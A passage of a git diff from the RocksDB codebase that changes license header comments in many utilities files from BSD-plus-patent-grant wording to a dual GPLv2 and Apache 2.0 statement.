a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index b1ef7ec5bd2..f45a42f60a9 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index b6221758867..6ee91d5f96b 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "utilities/blob_db/blob_db_impl.h" diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 8d81bc3fc1a..a5c5822bb76 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/blob_db/blob_db_options_impl.cc b/utilities/blob_db/blob_db_options_impl.cc index 40f8005f3f5..263213d8e34 100644 --- a/utilities/blob_db/blob_db_options_impl.cc +++ b/utilities/blob_db/blob_db_options_impl.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "utilities/blob_db/blob_db_options_impl.h" diff --git a/utilities/blob_db/blob_db_options_impl.h b/utilities/blob_db/blob_db_options_impl.h index e5b3ebedfa3..0ee0aa92005 100644 --- a/utilities/blob_db/blob_db_options_impl.h +++ b/utilities/blob_db/blob_db_options_impl.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 581d4299149..13ad7a2fa09 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/blob_db/blob_dump_tool.cc b/utilities/blob_db/blob_dump_tool.cc index c295712f815..f426802c2f9 100644 --- a/utilities/blob_db/blob_dump_tool.cc +++ b/utilities/blob_db/blob_dump_tool.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #ifndef __STDC_FORMAT_MACROS diff --git a/utilities/blob_db/blob_dump_tool.h b/utilities/blob_db/blob_dump_tool.h index 87d291b18ff..abba91dcad9 100644 --- a/utilities/blob_db/blob_dump_tool.h +++ b/utilities/blob_db/blob_dump_tool.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index 676da330fd1..51bba2fb862 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include diff --git a/utilities/blob_db/blob_log_format.cc b/utilities/blob_db/blob_log_format.cc index 1e55f8e6dd8..6917a290f37 100644 --- a/utilities/blob_db/blob_log_format.cc +++ b/utilities/blob_db/blob_log_format.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h index 4f6896455c3..b56cf205cc2 100644 --- a/utilities/blob_db/blob_log_format.h +++ b/utilities/blob_db/blob_log_format.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Log format information shared by reader and writer. diff --git a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc index 19c9bf32512..3931c8669b2 100644 --- a/utilities/blob_db/blob_log_reader.cc +++ b/utilities/blob_db/blob_log_reader.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/utilities/blob_db/blob_log_reader.h b/utilities/blob_db/blob_log_reader.h index cff26ed6aa9..05f53fe93f7 100644 --- a/utilities/blob_db/blob_log_reader.h +++ b/utilities/blob_db/blob_log_reader.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/utilities/blob_db/blob_log_writer.cc b/utilities/blob_db/blob_log_writer.cc index 295624ddc97..1ffc74a4299 100644 --- a/utilities/blob_db/blob_log_writer.cc +++ b/utilities/blob_db/blob_log_writer.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/utilities/blob_db/blob_log_writer.h b/utilities/blob_db/blob_log_writer.h index 4443c4eeb9e..b6c7a2a9901 100644 --- a/utilities/blob_db/blob_log_writer.h +++ b/utilities/blob_db/blob_log_writer.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/utilities/checkpoint/checkpoint_impl.cc b/utilities/checkpoint/checkpoint_impl.cc index 3a9606af4eb..0cdddbd628d 100644 --- a/utilities/checkpoint/checkpoint_impl.cc +++ b/utilities/checkpoint/checkpoint_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 Facebook. // Use of this source code is governed by a BSD-style license that can be diff --git a/utilities/checkpoint/checkpoint_impl.h b/utilities/checkpoint/checkpoint_impl.h index 4aba0d358e4..7deea9812de 100644 --- a/utilities/checkpoint/checkpoint_impl.h +++ b/utilities/checkpoint/checkpoint_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/checkpoint/checkpoint_test.cc b/utilities/checkpoint/checkpoint_test.cc index ec081f2902b..2872f3a426a 100644 --- a/utilities/checkpoint/checkpoint_test.cc +++ b/utilities/checkpoint/checkpoint_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/utilities/col_buf_decoder.cc b/utilities/col_buf_decoder.cc index 95d4426cc58..3fb31794f71 100644 --- a/utilities/col_buf_decoder.cc +++ b/utilities/col_buf_decoder.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "utilities/col_buf_decoder.h" #include diff --git a/utilities/col_buf_decoder.h b/utilities/col_buf_decoder.h index 8231770472e..e795e4ecdfc 100644 --- a/utilities/col_buf_decoder.h +++ b/utilities/col_buf_decoder.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/utilities/col_buf_encoder.cc b/utilities/col_buf_encoder.cc index 4e5f7e13050..feaf5646ae9 100644 --- a/utilities/col_buf_encoder.cc +++ b/utilities/col_buf_encoder.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "utilities/col_buf_encoder.h" #include diff --git a/utilities/col_buf_encoder.h b/utilities/col_buf_encoder.h index 38962e2e488..902879925c2 100644 --- a/utilities/col_buf_encoder.h +++ b/utilities/col_buf_encoder.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/utilities/column_aware_encoding_exp.cc b/utilities/column_aware_encoding_exp.cc index ff2d4c882c9..9dcd23eeddd 100644 --- a/utilities/column_aware_encoding_exp.cc +++ b/utilities/column_aware_encoding_exp.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef __STDC_FORMAT_MACROS #define __STDC_FORMAT_MACROS diff --git a/utilities/column_aware_encoding_test.cc b/utilities/column_aware_encoding_test.cc index 039c59ef762..b99ff563a24 100644 --- a/utilities/column_aware_encoding_test.cc +++ b/utilities/column_aware_encoding_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/utilities/column_aware_encoding_util.cc b/utilities/column_aware_encoding_util.cc index 5fd3e3ffefa..a77d38d1df9 100644 --- a/utilities/column_aware_encoding_util.cc +++ b/utilities/column_aware_encoding_util.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/utilities/column_aware_encoding_util.h b/utilities/column_aware_encoding_util.h index ea3d941a3a7..385d410d157 100644 --- a/utilities/column_aware_encoding_util.h +++ b/utilities/column_aware_encoding_util.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc index ad90437556d..43a25293456 100644 --- a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc +++ b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h index df303e8cd38..b4a389bc1b1 100644 --- a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h +++ b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/convenience/info_log_finder.cc b/utilities/convenience/info_log_finder.cc index 77f7bffe21c..72c4a6275ae 100644 --- a/utilities/convenience/info_log_finder.cc +++ b/utilities/convenience/info_log_finder.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 Facebook. // Use of this source code is governed by a BSD-style license that can be diff --git a/utilities/date_tiered/date_tiered_db_impl.h b/utilities/date_tiered/date_tiered_db_impl.h index 65c54bc73b3..2236cff8c7e 100644 --- a/utilities/date_tiered/date_tiered_db_impl.h +++ b/utilities/date_tiered/date_tiered_db_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/debug.cc b/utilities/debug.cc index 8bd79bae18c..ce0b9580c75 100644 --- a/utilities/debug.cc +++ b/utilities/debug.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/document/document_db.cc b/utilities/document/document_db.cc index 8637a2a3bdd..f7b5b3b2f3d 100644 --- a/utilities/document/document_db.cc +++ b/utilities/document/document_db.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/document/document_db_test.cc b/utilities/document/document_db_test.cc index b1cbc33bc9f..e8f4138c0bc 100644 --- a/utilities/document/document_db_test.cc +++ b/utilities/document/document_db_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/document/json_document.cc b/utilities/document/json_document.cc index 38c76284731..6917923a35b 100644 --- a/utilities/document/json_document.cc +++ b/utilities/document/json_document.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "rocksdb/utilities/json_document.h" diff --git a/utilities/document/json_document_builder.cc b/utilities/document/json_document_builder.cc index 6b9543fea32..7aa95e465c2 100644 --- a/utilities/document/json_document_builder.cc +++ b/utilities/document/json_document_builder.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include diff --git a/utilities/document/json_document_test.cc b/utilities/document/json_document_test.cc index 43e44008841..c7bfb39f383 100644 --- a/utilities/document/json_document_test.cc +++ b/utilities/document/json_document_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/env_librados_test.cc b/utilities/env_librados_test.cc index 1832033d2fb..7d9b252ea41 100644 --- a/utilities/env_librados_test.cc +++ b/utilities/env_librados_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2016, Red Hat, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/env_mirror.cc b/utilities/env_mirror.cc index 39cac3e028d..64c0b687115 100644 --- a/utilities/env_mirror.cc +++ b/utilities/env_mirror.cc @@ -1,7 +1,7 @@ // Copyright (c) 2015, Red Hat, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/utilities/env_mirror_test.cc b/utilities/env_mirror_test.cc index 0de68b305df..2bf8ec8583a 100644 --- a/utilities/env_mirror_test.cc +++ b/utilities/env_mirror_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2015, Red Hat, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/env_timed.cc b/utilities/env_timed.cc index 4a222547ef7..2afa0e0b58d 100644 --- a/utilities/env_timed.cc +++ b/utilities/env_timed.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "monitoring/perf_context_imp.h" #include "rocksdb/env.h" diff --git a/utilities/env_timed_test.cc b/utilities/env_timed_test.cc index 1d7bce6f92c..41d05e14cc5 100644 --- a/utilities/env_timed_test.cc +++ b/utilities/env_timed_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/geodb/geodb_impl.cc b/utilities/geodb/geodb_impl.cc index bb6aef61a17..a574e84fa37 100644 --- a/utilities/geodb/geodb_impl.cc +++ b/utilities/geodb/geodb_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/utilities/geodb/geodb_impl.h b/utilities/geodb/geodb_impl.h index e6c61338767..6b15f542215 100644 --- a/utilities/geodb/geodb_impl.h +++ b/utilities/geodb/geodb_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/utilities/geodb/geodb_test.cc b/utilities/geodb/geodb_test.cc index 3977f68ad7f..dcdb9825177 100644 --- a/utilities/geodb/geodb_test.cc +++ b/utilities/geodb/geodb_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE #include "utilities/geodb/geodb_impl.h" diff --git a/utilities/leveldb_options/leveldb_options.cc b/utilities/leveldb_options/leveldb_options.cc index 44f450e6904..977585fbd76 100644 --- a/utilities/leveldb_options/leveldb_options.cc +++ b/utilities/leveldb_options/leveldb_options.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/utilities/lua/rocks_lua_compaction_filter.cc b/utilities/lua/rocks_lua_compaction_filter.cc index 8cc3c049a1b..0934ca9c92e 100644 --- a/utilities/lua/rocks_lua_compaction_filter.cc +++ 